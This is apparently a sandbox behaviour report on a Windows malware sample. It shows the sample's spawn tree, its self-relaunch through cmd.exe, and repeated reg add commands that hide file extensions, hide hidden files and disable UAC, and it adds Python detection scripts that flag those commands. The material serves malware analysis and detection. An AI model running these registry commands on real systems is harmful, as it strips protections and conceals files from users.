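SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
REG = r"C:\Windows\SysWOW64\reg.exe"
DROP1 = r"C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe"
DROP2 = r"C:\ProgramData\WCwgcgww\QuYEoUUs.exe"

# Constructed input: the 16 rows of the table below, rebuilt from their columns.
SAMPLE_ROWS = (
    [f"PID 4452 wrote to memory of 3728 N/A {SAMPLE} {DROP1}"] * 3
    + [f"PID 4452 wrote to memory of 4476 N/A {SAMPLE} {DROP2}"] * 3
    + [f"PID 4452 wrote to memory of 4268 N/A {SAMPLE} {CMD}"] * 3
    + [f"PID 4268 wrote to memory of 3472 N/A {CMD} {SAMPLE}"] * 3
    + [f"PID 4452 wrote to memory of 2200 N/A {SAMPLE} {REG}"] * 3
    + [f"PID 4452 wrote to memory of 4588 N/A {SAMPLE} {REG}"]
)

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_tree(rows):
    """Return (children, images, writes).

    children: parent PID -> child PIDs in first-seen order
    images:   PID -> image path
    writes:   (parent, child) -> number of rows recorded for that edge
    """
    children = defaultdict(list)
    images = {}
    writes = Counter()
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m is None:
            continue
        parent, child, pimg, cimg = int(m[1]), int(m[2]), m[3], m[4]
        images.setdefault(parent, pimg)
        images.setdefault(child, cimg)
        if child not in children[parent]:
            children[parent].append(child)
        writes[(parent, child)] += 1
    return children, images, writes


def roots(children):
    """PIDs that write to others but are never written to: the tree roots."""
    written_to = {c for cs in children.values() for c in cs}
    return [p for p in children if p not in written_to]


def render(children, images, writes, pid, depth=0):
    """One line per process, indented by depth, with the edge's write count."""
    lines = [f"{'  ' * depth}{pid} {basename(images[pid])}"]
    for c in children.get(pid, []):
        sub = render(children, images, writes, c, depth + 1)
        sub[0] += f"  ({writes[(pid, c)]} writes from {pid})"
        lines.extend(sub)
    return lines


def relaunch_via_helper(children, images):
    """(grandparent, helper, child) triples where a helper such as cmd.exe
    starts a fresh copy of its own parent's image.  In this report that is
    4452 (the sample) -> 4268 cmd.exe -> 3472 (the sample's image again)."""
    parent_of = {c: p for p, cs in children.items() for c in cs}
    hits = []
    for helper, cs in children.items():
        gp = parent_of.get(helper)
        if gp is None:
            continue
        for c in cs:
            if images[c] == images[gp] and images[helper] != images[c]:
                hits.append((gp, helper, c))
    return hits


if __name__ == "__main__":
    children, images, writes = build_tree(SAMPLE_ROWS)
    for root in roots(children):
        print("\n".join(render(children, images, writes, root)))
    print("relaunch via helper:", relaunch_via_helper(children, images))
```

Rebuilt, the tree reads: 4452 (the sample) starts the two dropped executables 3728 and 4476, a cmd.exe 4268, and two reg.exe instances 2200 and 4588; cmd.exe 4268 in turn starts 3472, a new process with the sample's own image. relaunch_via_helper flags that last edge: the same image reappearing under a different parent is what a detection keyed only on the original PID would miss.
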
Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3496 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 1312 wrote to memory of 1404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4668 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1404 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe
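
The WriteProcessMemory table above records every parent-to-child spawn as three identical rows (the writes a parent makes into a child it has just created, not injection into an unrelated process), and the Processes list that follows repeats the same three reg.exe commands under each re-spawn of the sample. The Python below is an added example, not part of the sandbox report and not produced by its tooling: it collapses the triplicate rows into a parent/child map, reconstructs the ancestry of the cscript.exe instance, and flags the reg add commands that hide file extensions (HideFileExt=1), stop Explorer from showing hidden files (Hidden=2) and switch off UAC (EnableLUA=0, which needs an administrative write to HKLM and takes effect after a reboot). The input rows are copied from this report with the sample's long file name shortened to SAMPLE.exe; the single HideFileExt=0 line is a constructed control that must not be flagged.

```python
"""Added example (not part of the sandbox report): rebuild the spawn tree from the
report's WriteProcessMemory rows and flag the registry-tampering reg.exe commands."""
import re

# Constructed input: rows copied from the report's WriteProcessMemory table, with
# the sample's 64-hex-character name shortened to SAMPLE.exe. The report lists
# each spawn three times; the parser collapses the repeats.
WPM_ROWS = r"""
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe
PID 4452 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\ProgramData\WCwgcgww\QuYEoUUs.exe
PID 4452 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Windows\SysWOW64\cmd.exe
PID 4268 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe
PID 4452 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Windows\SysWOW64\reg.exe
PID 3472 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\SAMPLE.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 1164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
"""

# Constructed input: command lines copied from the Processes list, plus one
# HideFileExt=0 control line that is NOT in the report and must not be flagged.
CMDLINES = [
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2",
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f",
    r"cscript C:\Users\Admin\AppData\Local\Temp/file.vbs",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 0",
]

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
REG_ADD_RE = re.compile(r"^reg(?:\.exe)?\s+add\s+(\S+)\s*(.*)$", re.IGNORECASE)

# (key suffix, value name, data) -> verdict. Values taken from this report.
TAMPER_RULES = {
    (r"explorer\advanced", "hidefileext", "1"): "Explorer hides file extensions",
    (r"explorer\advanced", "hidden", "2"): "Explorer hides hidden files",
    (r"policies\system", "enablelua", "0"): "UAC disabled via EnableLUA=0 (admin write to HKLM, active after reboot)",
}


def build_process_tree(rows):
    """Return (parent_of, image_of); dict assignment collapses the triplicate rows."""
    parent_of, image_of = {}, {}
    for line in rows.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # skip anything that is not a WriteProcessMemory row
        ppid, cpid, pimg, cimg = m.groups()
        parent_of[int(cpid)] = int(ppid)
        image_of.setdefault(int(ppid), pimg)
        image_of.setdefault(int(cpid), cimg)
    return parent_of, image_of


def ancestry(pid, parent_of, image_of):
    """Walk from pid to the root and return image basenames, root first."""
    chain, seen = [], set()
    while pid in image_of and pid not in seen:
        seen.add(pid)  # guard against a malformed cyclic tree
        chain.append(image_of[pid].rsplit("\\", 1)[-1])
        pid = parent_of.get(pid)
    return chain[::-1]


def parse_reg_add(cmd):
    """Return (key, value name, type, data) for a 'reg add' line, else None."""
    m = REG_ADD_RE.match(cmd.strip())
    if not m:
        return None
    key, rest = m.groups()
    opts, toks, i = {}, rest.split(), 0
    while i < len(toks):  # /v, /t and /d take one argument each; /f takes none
        t = toks[i].lower()
        if t in ("/v", "/t", "/d") and i + 1 < len(toks):
            opts[t], i = toks[i + 1], i + 2
        else:
            i += 1
    return key, opts.get("/v"), opts.get("/t"), opts.get("/d")


def classify(cmd):
    """Verdict string if cmd matches a tampering rule, otherwise None."""
    parsed = parse_reg_add(cmd)
    if parsed is None:
        return None
    key, name, _type, data = parsed
    for (suffix, vname, bad), verdict in TAMPER_RULES.items():
        if key.lower().endswith(suffix) and (name or "").lower() == vname and data == bad:
            return verdict
    return None


def findings(cmdlines):
    """All (command line, verdict) pairs that trip a rule."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


if __name__ == "__main__":
    parent_of, image_of = build_process_tree(WPM_ROWS)
    print("cscript.exe ancestry:", " -> ".join(ancestry(1164, parent_of, image_of)))
    for cmd, verdict in findings(CMDLINES):
        print(f"[{verdict}] {cmd}")
```

The ancestry for PID 1164 comes out as sample, cmd.exe, sample, cmd.exe, cscript.exe, which matches the pattern visible in the Processes list: the sample relaunches itself through cmd.exe /c and each generation runs the same reg.exe and cscript.exe children. An incident responder can feed real process-creation telemetry to the same rules after mapping it onto the row format; the key/value matching is case-insensitive because reg.exe accepts either case.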

Processes

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe

"C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe"

C:\ProgramData\WCwgcgww\QuYEoUUs.exe

"C:\ProgramData\WCwgcgww\QuYEoUUs.exe"

C:\ProgramData\uQMsEIoc\AMAkoQUc.exe

C:\ProgramData\uQMsEIoc\AMAkoQUc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZckUMcco.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\liwwEsAI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZWgsYUss.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TUUEAIAU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\IWkYMYcQ\bAIksggA.exe

"C:\Users\Admin\IWkYMYcQ\bAIksggA.exe"

C:\ProgramData\resAEcUc\eWMwoIIE.exe

"C:\ProgramData\resAEcUc\eWMwoIIE.exe"

C:\ProgramData\smcogUYY\UqkoUUYs.exe

C:\ProgramData\smcogUYY\UqkoUUYs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4956 -ip 4956

C:\Windows\SysWOW64\WerFault.exe

